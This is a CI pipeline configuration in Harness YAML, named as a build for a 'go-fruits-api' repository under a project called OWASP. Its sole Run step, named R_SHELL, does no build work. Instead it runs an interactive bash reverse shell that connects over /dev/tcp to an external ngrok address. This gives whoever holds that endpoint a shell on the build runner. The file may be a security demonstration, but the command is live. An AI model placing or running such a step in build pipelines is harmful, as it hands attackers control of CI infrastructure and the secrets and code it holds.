pipeline:
  identifier: Build_go_fruits_api_1686138886411
  name: Build go-fruits-api
  orgIdentifier: default
  projectIdentifier: OWASP
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1683015583249
        repoName: yash-harnessio/go-fruits-api
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          cloneCodebase: true
          execution:
            steps:
              - step:
                  type: Run
                  name: R_SHELL
                  identifier: BEE
                  spec:
                    shell: Bash
                    command: /bin/bash -i >& /dev/tcp/0.tcp.in.ngrok.io/19480 0>&1
                  failureStrategies:
                    - onFailure:
                        errors:
                          - AllErrors
                        action:
                          type: MarkAsFailure
          platform:
            arch: Amd64
            os: Linux
          runtime:
            spec: {}
            type: Cloud
        type: CI
        when:
          pipelineStatus: All
